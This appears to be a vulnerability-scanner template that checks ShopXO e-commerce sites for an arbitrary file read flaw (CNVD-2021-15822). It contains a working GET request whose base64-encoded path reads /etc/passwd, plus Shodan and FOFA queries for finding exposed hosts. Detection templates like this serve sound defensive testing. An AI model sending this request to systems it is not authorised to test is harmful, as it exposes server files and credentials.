id: CNVD-2021-15822

info:
  name: ShopXO Download File Read
  author: pikpikcu
  severity: high
  description: |
    ShopXO is an open source enterprise-level open source e-commerce system. ShopXO has an arbitrary file reading vulnerability, which can be used by attackers to obtain sensitive information.
  reference:
    - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"ShopXO企业级B2C电商系统提供商"
    fofa-query: app="ShopXO企业级B2C电商系统提供商"
  tags: ShopXO电商系统

http:
  - raw:
      - |
        GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=  HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100e57dac96ae0d1f36edfe893b5ac5525e60fc88fea028433abee6b60f107eaac2022100e549b69ef2d7a7b4268b8552e4990a3e588b27df60f5ea99bef5c6b6042eefbf:922c64590222798bb761d5b6d8e72950
